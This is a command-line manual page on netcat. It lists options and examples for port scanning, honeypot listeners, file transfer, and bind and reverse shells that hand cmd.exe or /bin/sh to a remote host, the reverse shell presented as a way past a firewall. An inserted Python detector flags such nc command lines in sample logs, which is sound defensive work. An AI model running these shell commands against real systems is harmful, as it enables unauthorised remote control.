May 23, 2021  DOS Command Learning Manual
1. Swiss Army Knife: nc.exe
Description of the parameters:
-h          Show help information
-d          Detach from the console (background mode)
-e prog     Program redirection: run prog once a connection is made (flagged as dangerous)
-i secs     Delay interval between lines sent or ports scanned
-l          Listen mode, for inbound connections
-L          Listen mode that keeps listening after a connection closes, until Ctrl-C
-n          Numeric IP addresses only; domain names cannot be used
-o file     Record a hex dump of the transfer to file
-p port     Local port number
-r          Randomize local and remote ports
-t          Answer Telnet negotiation
-u          UDP mode
-v          Verbose output; -vv is more verbose
-w secs     Timeout for connects and final network reads
-z          Zero-I/O mode: input and output are turned off (used for port scanning)
Basic usage:
nc -nvv 192.168.0.1 80                             Connect to port 80 of host 192.168.0.1
nc -l -p 80                                        Open TCP port 80 on this machine and listen
nc -nvv -w2 -z 192.168.0.1 80-1024                 Scan ports 80-1024 of 192.168.0.1
nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe      Bind the host's cmd shell to its TCP port 5354 (bind shell)
nc -t -e c:\winnt\system32\cmd.exe 192.168.0.2 5354   Bind the host's cmd shell and connect it back to port 5354 of 192.168.0.2 (reverse shell)
Advanced usage:
nc -L -p 80                                 Honeypot 1: open port 80 and keep listening until Ctrl-C
nc -L -p 80 > c:\log.txt                    Honeypot 2: open port 80, keep listening until Ctrl-C, and write what is received to c:\log.txt
nc -L -p 80 < c:\honeyport.txt              Honeypot 3-1: open port 80, keep listening until Ctrl-C, and feed the contents of c:\honeyport.txt into the connection; this can also be used to transfer a file
type.exe c:\honeyport.txt | nc -L -p 80     Honeypot 3-2: same as 3-1, but the contents of c:\honeyport.txt are supplied through a pipe; this can also be used to transfer a file
Reverse connection:
On this machine:    nc -l -p <local port>
On the other host:  nc -e cmd.exe <local IP> <local port>    (Win2K)
                    nc -e /bin/sh <local IP> <local port>    (Linux, Unix)
Because the other host initiates the connection, this gets through that host's firewall.
File transfer:
On this machine:    nc -d -l -p <local port> < <path and name of the file to send>
On the other host:  nc -vv <local IP> <local port> > <path and name under which to store the file>
This transfers the file to the other host.
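As an added example from the defender's side (not part of the manual), the option table above can be turned into a detector for endpoint telemetry: the script below reads constructed process-creation log lines and flags nc invocations, rating -e program redirection as a bind shell (with -l/-L) or a reverse shell (without), -z as a port scan, and plain -l/-L as a listener. The log format, host names and user names are assumptions made for the sample.

```python
import re
# Constructed sample process-creation log lines ("<ts> <host> <user> <command line>"), not from the page.
SAMPLE_LOG = """\
2021-05-23T10:01:12 ws01 alice C:\\tools\\nc.exe -nvv 192.168.0.1 80
2021-05-23T10:02:40 ws01 alice nc -nvv -w2 -z 192.168.0.1 80-1024
2021-05-23T10:03:05 srv02 SYSTEM nc.exe -d -L -p 5354 -t -e c:\\winnt\\system32\\cmd.exe
2021-05-23T10:03:09 srv02 bob nc -e cmd.exe 192.168.0.2 5354
2021-05-23T10:04:00 ws01 alice notepad.exe c:\\log.txt
"""

NC_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat"}
OPTS_WITH_ARG = {"e", "p", "w", "i", "o"}  # options that take a value, per the table above

def parse_nc_args(args):
    """Expand clustered flags (-nvv -> n,v,v); collect option values; keep positionals."""
    flags, values, positional, it = [], {}, [], iter(args)
    for tok in it:
        rest = tok[1:] if len(tok) > 1 and tok[0] == "-" else ""
        if not rest:
            positional.append(tok)
        while rest:
            ch, rest = rest[0], rest[1:]
            if ch in OPTS_WITH_ARG:  # value is attached (-w2) or is the next token (-e prog)
                values[ch] = rest or next(it, "")
                break
            flags.append(ch)
    return flags, values, positional

def classify(cmdline):
    """Return (severity, description) for an nc-style command line, or None if it is not nc."""
    argv = cmdline.split()
    if re.split(r"[\\/]", argv[0])[-1].lower() not in NC_NAMES:
        return None
    flags, values, pos = parse_nc_args(argv[1:])
    target, port = " ".join(pos), values.get("p", "?")
    listener = "l" in flags or "L" in flags
    if "e" in values:  # program redirection: a shell is handed to whoever connects
        kind = f"bind shell on port {port}" if listener else f"reverse shell to {target}"
        return "high", f"{kind}: {values['e']}"
    if "z" in flags:
        return "medium", f"port scan of {target}"
    if listener:
        return "medium", f"listener on port {port}"
    return "low", f"outbound connection to {target}"

def scan_log(text):
    """Run classify() over '<ts> <host> <user> <cmdline>' lines; return (host, user, sev, desc)."""
    out = []
    for line in filter(str.strip, text.splitlines()):
        _ts, host, user, cmdline = line.split(maxsplit=3)
        if (hit := classify(cmdline)):
            out.append((host, user, *hit))
    return out
```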
Note:
|        Pipe: passes the output of the command on the left to the command on the right as its input.
< or >   Redirection. For example, tlntadmn < test.txt feeds the contents of test.txt to the tlntadmn command as its input.
@        Executes the command that follows it without echoing it (background execution);
The difference between > and >>: > means overwrite;
For example, run @dir c:\winnt > d:\log.txt and @dir c:\winnt >> d:\log.txt one after the other and compare: with > only the second result is saved, and with >>: